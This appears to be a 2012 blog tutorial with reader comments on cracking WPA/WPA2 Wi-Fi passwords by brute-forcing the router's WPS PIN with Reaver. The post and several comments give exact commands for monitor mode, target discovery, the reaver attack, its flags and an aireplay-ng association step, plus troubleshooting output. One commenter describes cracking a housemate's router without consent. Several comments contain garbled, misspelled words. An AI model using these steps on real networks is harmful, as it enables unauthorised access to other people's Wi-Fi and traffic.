Crack a WPA WPA 2 encypted router with reaver

By | May 8, 2012

There is a new tool to use with Backtrack/Kali Linux for Pen Testers called Reaver which is a great little tool. Reaver will crack a WPA/WPA2 encrypted router within ten hours. On the Reaver page it says two to ten hours. Here is the page
Anyone who has ever tried to capture the password of a WPA encrypted router knows how hard it can be sometimes. Having to get a WPA capture then using aircrack or other tools to try and crack the password with a dictionary. Reaver is a great addition to existing tools.

Reaver takes advantage of a vulnerability in something called Wi-Fi Protected Setup, or WPS. It’s a feature that exists on many routers, intended to provide an easy setup process, and it’s tied to a PIN that’s hard-coded into the device. Reaver exploits a flaw in these PINs and the result is that, with enough time, it can reveal your WPA or WPA2 password. Reaver does not attempt to take on the WPA encryption itself but goes around it using WPS and then displaying the password.
Using Reaver

Reaver runs inside of Backtrack or other Linux variations.

1. Download Backtrack and run it inside VMware or burn it to a disk and boot off of it.

2. You will need a USB adapter compatible with Backtrack and that can do packet injecting. Here are Backtrack compatible USB adapters.

3. Start Backtrack and run the following command
apt-get update

4. Then install reaver with the following command
apt-get install reaver

5. We need the Bssid to run reaver so run the following commands
airmon-ng start wlan0
airodump-ng mon0

6. Coppy the BSSID and then run the following command.
reaver -i mon0 -b (The BSSID) –vv
Reaver will now run and start a brute force attack against the Pin number of the router. Reaver does not work with all routers only routers that have WPS installed which is around 80% of routers. Also reaver needs a good signal strength to run or it will have problems.

For more information here is the reaver wiki

Incoming search terms:

  • kali reaver receive timeout occurred
  • reaver giving wrong password
  • aircrack-ng rc2 failed to assosiate
  • reaver signal strength
  • reaver receive timeout occurred

12 thoughts on “Crack a WPA WPA 2 encypted router with reaver

  1. kh498

    Hello! Iv just did this tot and when reaver said it was 100% then a numer chowed up and it said

    [+] Pin cracked in 13214 seconds
    [+] WPS PIN: ‘20092085’
    [+] AP SSID: ‘-censored-‘

    what shall I do with this iv tried to put it in the password field but its not working!?

    1. Gus

      So I got the thing compiled, on linux. And it looks like it isn’t mreely tied to linux (that’s what you’re using pcap for, because it provides _portable_ capturing?) but more or less tied to your computer. You really should try and compile it on a different unix, fix all the includes linux silently adds but other unices don’t, heck even run that README through a text-formatter set to less than 80 characters wide, do some cross-testing and all that.Some sort of verbose reporting would be nice too. I just ran the thing for a night on two different wifi interfaces presumably in monitor mode (let kismet do the heavy lifting there) but all it did was say once waiting for beacon and sit there until eternity. Kismet sees beacons, your software doesn’t. Well, useful.As much as I dislike the hype around python, I think I’ll wait for Stefan’s code as it looks like having a better shot at actually working on systems not equal to the author’s.

      1. Jossph

        Hi Craig,Thanks for your tool, I used by i have this problem: Any idea?Perhaps the rouetr is not vulnerate ??reaver -i mon0 -b 5C:33:8E:XX:XX:XX -vvReaver v1.2 WiFi Protected Setup Attack ToolCopyright (c) 2011, Tactical Network Solutions, Craig Heffner [+] Waiting for beacon from 5C:33:8E:XX:XX:XX[+] Switching mon0 to channel 2[+] Switching mon0 to channel 3[+] Switching mon0 to channel 4[+] Switching mon0 to channel 5[+] Switching mon0 to channel 6[+] Switching mon0 to channel 6[+] Associated with 5C:33:8E:XX:XX:XX (ESSID: Orange-xxxx)[+] Trying pin 31716925[+] Trying pin 54326927[!] WARNING: Failed to associate with 5C:33:8E:XX:XX:XX (ESSID: Orange-xxxx)[+] Switching mon0 to channel 7[!] WARNING: Failed to associate with 5C:33:8E:XX:XX:XX (ESSID: Orange-xxxx)[+] Switching mon0 to channel 8

        1. Aminat

          reaver -i mon0 -b 5C:33:8E:XX:XX:XX -vvReaver v1.2 WiFi Protected Setup Attack ToolCopyright (c) 2011, Tactical Network Solutions, Craig Heffner [+] Waiting for beacon from 5C:33:8E:XX:XX:XX[+] Switching mon0 to chnenal 6[+] Associated with 5C:33:8E:XX:XX:XX (ESSID: Orange-xxxx)[+] Trying pin 86481762[!] WARNING: Receive timeout occurred[!] WARNING: Receive timeout occurred[!] WARNING: Receive timeout occurred[!] WARNING: Receive timeout occurred[!] WARNING: Receive timeout occurred[!] WARNING: Receive timeout occurred[!] WARNING: Receive timeout occurred .My chipset is Ralink RT2870/3070 and driver rt2800usb..Any idea? Do you think the AP is vulnerable?Thanks Happy New Year Craig !!

        2. Losefar

          I have a question about walsh/wash: after pribong about 30 APs with WPA/WPA2 enabled, I found that no-one of them has WPS. My router has WPS, but no configuration at all in the panel (it’s an ISP-provided), and I am sure only about the button-enabled WPS, unsure about external registrar. By the way, I’m pretty sure that two routers in my range support it. They also respond to reaver’s attempts, but they don’t show up in wash’s output. What may be happening? Am I doing wrong? My card’s driver are patched for injection and I use it seamlessly for other WiFi tests.

  2. admin Post author

    Did it give you a WPA PSK “Password” I don’t see that in your post. so far when I have done it the WPA PSK “Password” is in between the WPA PIN: and AP SSID. I see it says cracked but I wonder if it did since it doesn’t seem to have given you the password.

    1. Ida

      Reaver/walsh works great on Sabayon Linux with a Realtek-chipset card I bought for about $13.My rmamoote was bitching about high Internet bills and blamed me for the bills. I have a wired connection and I *do* use Torrents a fair bit. My rmamoote uses a wireless connection (despite being less than 20 feet from the router, as the crow flies) and insisted I was the cause of the high bill, but I know damned well I wasn’t responsible. We have another rmamoote who watches YouTube *endlessly*, but I got the blame. And, you have an unnecessary wireless network, in a household where not one of us uses wireless devices. Dude, nobody can hack it because I have a very long and complicated password! I used a car’s VIN number! Yeah, well, his Pontiac’s VIN, read through the windshield, wasn’t it. Reaver did it. 987654321abc was his super-complicated password. Jesus, a password guessing program might have done it. Reaver cracked it in about 4 hours. Thank you. He no longer bitches at me. Even admitted that I know more about computers than he does (my degree in Electrical Engineering from a Canadian University kind of trumps his time spent at the counter of a car-rental company, I would have thought )

      1. Leonel

        this: An attacker can deivre information about the correctness of parts the PIN from the APb4s responses. If the attacker receives an EAP-NACK message after sending M4, he knows that the 1st half of the PIN was incorrect. If the attacker receives an EAP-NACK message after sending M6, he knows that the 2nd halfof the PIN was incorrect.This form of authentication dramatically decreases the maximum possible authentication attempts needed from 10^8 (=100.000.000) to 10^4 + 10^4(=20.000). As the 8th digit of the PIN is always a checksum of digit one to digit seven, there are at most 10^4 + 10^3 (=11.000) attempts needed to find the correct PIN. I’ve noticed, using Reaver, that in the PIN attempts the second half of the PIN is reused quite frequently, sometimes 3 times out of 5 in a row. Is this because the the second half of the PIN cannot be tested until the 1st half has been successfully identified? After re-reading the paper I think this is the case, but I was hoping for confirmation.

        1. Jeremy

          Using version 1.4 to crack a Netgear WPA seecrud router. Man, it is taking FOREVER. The problem with Reaver is when you start to attack routers with timeout values. It will get into a situation where there is a minimum timeout after so many attempts before it lets reaver rechallenge WPS. After 10 failed attempts, I set -x = 250 seconds. That’s over 4 minutes. So, it has taken me over 8 hours just to get to 18% of the pins. Worst case estimate, is it takes about 45+ hours to finish. That’s a lot better than a straight dictionary attack, but it is way worse than 10 hours. Don’t delude yourself into thinking Reaver will crack WPA in 10 hours or less. Also, lots of routers do not have WPS enabled or supported. For the newbies, you should use wash to figure out which AP’s and routers support WPS.Finally, some routers will lock down WPS after too many failed attempts. So, just so people know, Reaver is not the end alls. It is just another tool in the lockpicker’s arsenal. Personally, I think a better way would be to do a middle man attack.

  3. Bagas

    Hey Colt!Thanks for rep appreciate it!As far as I know, there’s no coammnd to detect it However, it becomes pretty easy to find out with some testing. I recommend:Launch reaver with the verbose, fixed and auto options.reaver -i [interface] -a -vv -f -b [bssid]Auto will automatically detect best settings.Fixed will skip the annoying changing channel thing (what router randomly changes channels anyway? lol)Verbose will give you let you know what’s going on..If you see the pattern similar to the video where packets are being sent and received, then everything is working as intended.If you pay close attention you will even recognize the proper timing for the packets.Now, the problems you might encounter: Not able to associate For this, you can try associating yourself. So launch reaver with the -A option and do the following coammnd:aireplay-ng -1 0 -b [target bssid] -h [your mac] [monitor interface]If the progress is really slow, you might want to look up the mac address of the target and see if you should use a delay for the attempts..Of course you should consider how far your target is as well, maybe buy a nice wireless card. I personally use the Alfa awus036nh.Hope these tips help you somehow!Take care

  4. franco

    i really have some problems with all this……WARNING: Failed to associate with F0:7D:68:F0:C9:0U (ESSID: uioohh)
    i really need your help !!! i have 036NH ,backtrack 5 and reaver pro and i don’t know where i do the mistake !!!
    can you please tell me from where did you take reaver ?


Leave a Reply

Your email address will not be published. Required fields are marked *